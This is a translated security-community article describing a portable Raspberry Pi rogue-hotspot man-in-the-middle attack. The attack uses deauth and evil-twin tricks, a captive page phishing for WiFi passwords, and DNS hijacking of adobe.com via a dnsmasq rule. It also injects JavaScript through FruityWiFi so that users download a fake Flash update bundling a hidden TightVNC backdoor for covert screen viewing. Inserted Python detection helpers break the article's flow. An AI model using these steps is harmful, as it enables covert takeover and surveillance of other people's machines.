Portable Raspberry Pi Toolkit: Man-in-the-Middle Attack for Control

Introduction

The previous article explained the setup of the Portable Raspberry Pi Toolkit. Recently, I have made some optimizations, mainly improving its portability and aesthetics. At the same time, some issues were discovered during actual use, leading to minor modifications.


Traditional man-in-the-middle attacks require sensitive operations such as arpspoof, which antivirus software often intercepts; the attacked side may also see garbled pages, slow connections, or even disconnections. Using a Raspberry Pi as a physical man-in-the-middle avoids these problems: one network card of the Raspberry Pi connects to the internet while the other acts as a hotspot, so client traffic is hijacked to pass through the Pi itself.

Preparation

1.) Overall Concept

This penetration test adopts an induced installation method, injecting JavaScript into web pages through man-in-the-middle hijacking, prompting users to download a bundled backdoor Flash Player update program.

There are several hijacking methods, roughly listed as follows:

1. If the universal key software can connect:

I. Gain administrative control of the target router, change its WiFi configuration, and have the Raspberry Pi impersonate the original hotspot.

II. If the target router supports relay mode, reconfigure it as a relay whose upstream device is the Raspberry Pi.

2. If the universal key software cannot connect:

I. Send deauth attacks to break the client's connection with the target router while the Raspberry Pi forges a hotspot. By enabling no-pool in the Raspberry Pi's dnsmasq.conf, starting the web server, and configuring a 404 page, the page pops up automatically once the client connects, prompting the user to enter the WiFi password.

II. Capture handshake packets with the Raspberry Pi and have them cracked for fifteen yuan on Taobao.

III. Use social engineering to get physical access to the router and quickly press its WPS button.

2.) Generate Backdoor Program

The best backdoors are common software that antivirus programs will never flag, for example ftpserver, Sunlogin (oray), VNC server, and so on. Here I choose tight-vnc-server for its compactness and convenience; generating the backdoor requires tools such as 7-Zip SFX Maker, Resource Hacker, and Regsnap. First install it locally, then compare the changes to the registry and file system, and finally extract, trim, and package it together with Flash Player so that it installs silently in the background. Then test it in various environments and make targeted modifications.

After testing, place the backdoor program in the Apache root directory, specifying the exact location in the JavaScript below.

3.) Configure dnsmasq to hijack adobe.com to local

Modify /etc/dnsmasq.conf to add

address=/adobe.com/10.0.0.1

Then restart dnsmasq with service dnsmasq restart to make the configuration effective. Next, start Apache with service apache2 start.
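The dnsmasq rule above makes a public domain resolve to a LAN address, which is a pattern a client or network monitor can check for. The following detection helper is an added example, not part of the original article: it flags DNS answers (and dnsmasq directives) that map a non-local name to a private, loopback, or link-local address. The sample answers are constructed; the domain and IP values are illustrative only.

```python
import ipaddress
import re

# Constructed sample: DNS answers as a client on the hotspot might observe them.
# The adobe.com entries mirror the article's spoofing rule; the others are filler.
SAMPLE_ANSWERS = [
    ("adobe.com", "10.0.0.1"),
    ("get.adobe.com", "10.0.0.1"),
    ("example.net", "93.184.216.34"),
    ("printer.lan", "192.168.1.20"),
]

# Name suffixes that legitimately resolve to private addresses on a home/office LAN.
LOCAL_SUFFIXES = (".lan", ".local", ".home", ".internal")


def is_public_name(name):
    """Internet names that should never resolve to a private address."""
    return not name.rstrip(".").lower().endswith(LOCAL_SUFFIXES)


def hijacked_answers(answers):
    """Return (name, ip) pairs where a public name resolves to a non-global address.

    A spoofing line such as ``address=/adobe.com/10.0.0.1`` yields exactly this
    pattern: a well-known internet domain answered with an RFC 1918, loopback or
    link-local address, which an honest upstream resolver would not return.
    """
    flagged = []
    for name, ip in answers:
        addr = ipaddress.ip_address(ip)
        if is_public_name(name) and not addr.is_global:
            flagged.append((name, ip))
    return flagged


def audit_dnsmasq_conf(text):
    """Parse dnsmasq ``address=/domain/ip`` directives from a config text and flag
    those that redirect an internet domain to a non-global address (a spoofing
    rule rather than a legitimate split-horizon entry for a local name)."""
    pattern = re.compile(r"^\s*address=/([^/]+)/(\S+)\s*$", re.MULTILINE)
    return hijacked_answers(pattern.findall(text))


if __name__ == "__main__":
    for name, ip in hijacked_answers(SAMPLE_ANSWERS):
        print(f"suspicious answer: {name} -> {ip}")
```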

4.) Install and Configure Software

root@kali:~# apt-get install fruitywifi-module-fruityproxy
root@kali:~# service fruitywifi start

Open http://your-raspberry-pi-address:8000 and log in with both the username and the password set to admin.

Config settings are as shown below:

[Screenshot of the FruityWiFi configuration]

IN is the network card providing the AP access point, and OUT is the network card connecting to the internet, which can be configured based on actual conditions.

5.) Implement Penetration

With all preparations complete, the target device’s traffic is now all routed through the Raspberry Pi.


First, run bettercap to sniff all traffic flowing through the Raspberry Pi and get a rough picture of the network (commonly used commands can be written into scripts for convenience).

bettercap -I wlan1 -O log.txt -X -L -S NONE


From the captured traffic and nmap scans, the target host's IP address can be determined quickly. Then, when that host accesses the network, enable the fruitywifi Inject module.

In status→fruityprox edit→Inject, write the JavaScript to be injected to induce downloads.

<script>(function(a){window.isMobile=false;if(/(android|ipad|playbook|silk|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)....

The injected script cannot have line breaks, so the code needs to be compressed in advance. The local test style is as follows:

[Screenshot of the local test]

After injection, the script automatically detects whether the current browser is on a mobile device or a PC. On a PC it waits three seconds, then pops up the mask and induces the download; after the user clicks, it closes the mask and restores the page (or keeps blocking it). On mobile, nothing happens. Moreover, since dnsmasq on the Raspberry Pi makes the Pi the client's default DNS and DHCP server, and the adobe domain is hijacked, clients notice nothing unusual. (The download link is http rather than adobe's default https, but this is enough to deceive many people.)
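A transparent proxy that injects inline script into plain-HTTP pages leaves two observable traces described above: script elements that are absent when the same page is fetched over a trusted path (HTTPS or a clean network), and a plain-http link to an executable on a vendor domain. The following detector is an added example, not code from the article or from FruityWiFi; the two HTML pages are constructed, and the injected snippet and URL are illustrative placeholders.

```python
import re
from html.parser import HTMLParser

# Constructed sample: the same page as served over a trusted path (REFERENCE) and
# as observed over plain HTTP on the suspect network (OBSERVED). Illustrative only.
REFERENCE = "<html><head><script src='/static/app.js'></script></head><body><p>News</p></body></html>"
OBSERVED = REFERENCE.replace("</body>", """<script>window.isMobile=false;setTimeout(function(){document.body.innerHTML+='<a href="http://get.adobe.com/update.exe">Update Flash Player</a>'},3000)</script></body>""")


class _ScriptCollector(HTMLParser):
    """Collect ("src", url) for external scripts and ("inline", body) for inline ones."""

    def __init__(self):
        super().__init__()
        self.scripts = set()
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.add(("src", src))
            else:
                self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:  # script content arrives as CDATA, tags included
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._buf).strip()
            if body:
                self.scripts.add(("inline", body))


def scripts_in(html):
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def injected_scripts(reference_html, observed_html):
    """Scripts present in the observed page but absent from the trusted copy."""
    return sorted(scripts_in(observed_html) - scripts_in(reference_html))


def http_exe_links(scripts):
    """Plain-http URLs to executables inside inline scripts: the 'update' lure signal."""
    urls = []
    for kind, text in scripts:
        if kind == "inline":
            urls.extend(re.findall(r"http://[^\s'\"<>]+\.exe\b", text))
    return urls
```

Running `http_exe_links(injected_scripts(REFERENCE, OBSERVED))` on the constructed pages returns the single plain-http executable link carried by the injected script; a clean page pair returns an empty list.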

6.) Check Execution Status

Periodically scan the target IP with nmap. When the 5900 port is open, it confirms that the penetration is complete, at which point disable the Inject module.

Appendix – Installation Process:

[Screenshot of the installation process]

The backdoor program installs alongside tvnserver. Even if something unexpected happens and the tvnserver installation fails, the installation status is checked again after the Flash Player installer finishes and a second installation attempt is made (it is not installed as a system service, but runs in user mode).

7.) Enjoy

Use vncviewer to connect, and the target host will have no prompts or icons. You can also observe the other party’s screen without affecting the target host.


Well, don’t doubt it. I work at a data center in a hospital, responsible for maintaining system security.

Hereby, dedicated to everyone.

*This article was written by Rc4x and belongs to FreeBuf's original reward program; unauthorized reproduction is prohibited.
